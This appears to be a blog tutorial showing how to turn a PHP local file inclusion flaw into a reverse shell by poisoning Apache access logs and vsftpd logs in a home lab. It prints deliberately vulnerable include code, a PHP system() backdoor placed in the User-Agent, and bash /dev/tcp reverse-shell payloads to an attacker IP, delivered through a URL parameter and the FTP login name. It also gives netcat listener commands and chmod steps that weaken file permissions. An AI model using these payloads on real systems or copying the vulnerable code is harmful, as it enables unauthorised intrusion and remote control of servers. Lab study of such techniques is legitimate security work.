Get Reverse Shell Through Log Poisoning with the Vulnerability of — LFI ( LOCAL FILE INCLUSION )

Image by unsplash.com

Introduction :-

This post is about to get the reverse shell through log poisoning, in this post we are going to discuss about what is Lfi, examples of lfi vulnerable code, how to get reverse shell through Log Poisoning with the lfi vulnerability and practicle also included .

LFI :-

LFI (Local File Inclusion) is a web application vulnerability which occure when an application code take input via GET method or POST method to include any file which are placed over the server without any sanitization of input value , due to which attackers give arbitary inputs in order to theft the confidential information or to get the control over the system.

Example how lfi vulnerable code looks like :-

<?php

echo “file include : “. $_REQUEST[“file”] . “<br />”;
include($_REQUEST[“file”]);
echo “<br />”;

?>

In this example file is included without any sanitization.

Now open the Browser and hit the url :-

http://127.0.0.1/lfi_vuln/lfi-1.php?file=/etc/passwd

You will get the content of the passwd file. This is local file inclusion.

Methods to get the reverse shell :-

  • UPLOAD:-

On the web application if you get a upload option and know the location of the uploded file then you have to upload the reverse shell file and then go to the folder and execute your reverse shell , mention you ip and port number into the reverse shell file and start the listner [ nc -nlvp port-number] in the terminal and again execute your reverse shell file and you get the shell.

  • Directory With Permission of write :-

On the web application if we found any directory which have write permission then we have to write a file in that directory and inside the file we provide the code of the reverse shell and save the file to the directory and then execute the file and again turn on the listner in the terminal [ nc -nlvp port-number] and we got the reverse shell.

  • Log Poisoning :-

The Process of injecting the malicious code into the log file is known as log poisoning.
In our operating system each and every software or application have log file in which all the logs of the application and software are maintaind and its always up-to-date. In log file there is a instant updation done when we perform any activity with the perticular software or application.

If we found the log file in local file inclusion then Log poisoning perform in order to get the reverse shell .

We will cover 1st and 2nd method in another articlein this article we will discuss about the Log Poisoning in detail.

Requirment For Log Poisoning :-

  • Burp Suite
  • Log file — which we find through lfi Vuln
  • Vulnerable php code
  • Browser

We will Do Log Poisoning with :-

  • Apache
  • FTP

APACHE :-

Apache2 — it is a web server

log-file name — access.log

location :- /var/log/apache2/access.log

Apache log file contain details of the useragent.

Example :-

127.0.0.1 — — [23/Dec/2020:00:40:43 +0530] “GET /favicon.ico HTTP/1.1” 404 487 “-” “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”

This type of content are present in the log file of apache web server.
Now we have to inject our malicious code into the log file of apache.

Procedure :-

  • Make a new file let, lfi-1.php
  • Open a text editor and write the php code in that file :-
  • Save the file at the location :- /var/www/html/
  • Restart your apache server
  • Now browse your file :-

127.0.0.1/lfi-1.php

If it work properly then it give output like this

  • Now Check our local file inclusion work poperly or not :-

127.0.0.1/lfi-1.php?file=/etc/passwd

If it give output then our lfi works properly

if you get error of permission denied then for only practicle purpose give them a permission

chmod 644 /etc/passwd

  • Now we get the log file of apache :-

127.0.0.1/lfi-1.php?file=/var/log/apache2/access.log

If you get this file then we are able to do log poisoning

If you get error of permission denied then for practicle purpose set the permissions

chmod 644 /var/log/apache2/access.log
chmod 755 /var/log/apache2

  • Configure your Browser Proxy same as given in image
  • Preferences —Network Setting —
  • Open your burp suit and go to the proxy section and turn on the intercept
  • Now brows this in browser :-

127.0.0.1/lfi-1.php?file=/var/log/apache2/access.log

as we know that our intercept is on so our request comes in the burp where we decide what to do with the request

  • Come to the burp suite and see the request

This is the request of our lfi file.

In this file there is a line in which user agent is given and previous we see that in the log file of apache useragent details are maintaine by apache log file , so we have to give our reverse shell in the user agent section by which it will include in access.log file and then when we execute the access.log file then we get reverse shell.

  • At the highleted section we give our payload which is a php Backdoor

payload :-

<?php echo system($_GET[‘cmd’]); ?>

Now forward the request

SENERIO :-

In this my ip is :- 192.168.29.45 replace it with our ip

We use port number 443 for reverse shell

  • Open the termial and turn on the listner on 443 port number . Here we get our reverse shell.

nc -nlvp 443

  • Again come to the Browser now its time to give the command to get the shell

http://192.168.29.45/lfi-1.php?file=/var/log/apache2/access.log&cmd=/bin/bash -c ‘bash -i > /dev/tcp/192.168.29.45/443 0>%261’

  • And Finally we get the shell

[+] Points to Remember :

  • We are able to give only one payload and correct payload in real life application allover we have only one chance .
  • Always start listner before execute file.
  • To practise it more time clear the log and restart apache server.
  • The shell we get from this is temperory shell not a tty shell so we to convert it into a stable/tty shell.

FTP :-

Ftp — File transfer protocol

log-file name — vsftpd.log

location :- /var/log/vsftpd.log

ftp log file contains details of login

FTP log Poisoning is very simple than that of the apache. FTP (FILE TRANSFER PROTOCOL) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.

Procedure :-

  • Firstly we have to install ftp on our system. For this following command is used :-

sudo apt install vsftpd

In my pc Iallready installed it that’s why showing this . You have to install it.

  • Now start our ftp by using following command : -

systemctl start vsftpd

systemctl enable vsftpd

  • Check the status that its in active state or not :-

systemctl status vsftpd

  • Now give permissions to the log file of the vsftpd :-

chmod -R 775 /var/log/vsftpd.log

  • Ftp log file :-
  • Now start Log Poisoning.

Requirnments For FTP Log Poisoning :-

  • vsftpd (In running condition)
  • Terminal
  • php lfi vulnerable code
  • Browser

Procedure :-

  • Make a new file let, lfi-1.php
  • Open a text editor and write the php code in that file :-
  • Save the file at the location :- /var/www/html/
  • restart your apache server
  • Now browse your file :-

127.0.0.1/lfi-1.php

If it work properly then it give output like this

  • Now Check our local file inclusion work poperly or not :-

127.0.0.1/lfi-1.php?file=/etc/passwd

If it give output then our lfi works properly

If you get error of permission denied then for only practicle purpose give them a permission

chmod 644 /etc/passwd

  • Now we get the log file of ftp:-

127.0.0.1/lfi-1.php?file=/var/log/vsftpd.log

If you get this file then we are able to do log poisoning

If you get error of permission denied then for practicle purpose set the permissions

chmod 644 /var/log/vsftpd.log

  • Open terminal and type

ftp ( your ip )

  • In this we give our payload in the name section which is stored in log file
  • Our Reverse shell Payload :-

“<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/192.168.29.45/443 0>&1’”); ?>”

(in this my ip is 192.168.29.45 change this with your ip)

  • Give this payload in Name section

press enter after giving payload. Then it ask for password leave it blank and hit enter . Now press [ ctrl+D ] for exit .

  • Check ftp log file for confirm that payload inserted successfully or not
  • Open the termial and turn on the listner on 443 port number . Here we get our reverse shell.

nc -nlvp 443

  • Now its time to take the shell by browsing ftp log file
  • Open Browser and browse the file

127.0.0.1/lfi-1.php?file=/var/log/vsftpd.log

  • And Finally we get shell

This is log poisoning with ftp

In this way we can do log poisoning with lots of services running on pc’s

Thank You for reading this artical.

If you like this article then do clap and Follow..

You can also follow me on linkedin and twitter

Linkedin :- https://www.linkedin.com/in/dheeraj-deshmukh-65b7901a4/

Twitter :- https://twitter.com/dheeraj_deshmuk

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store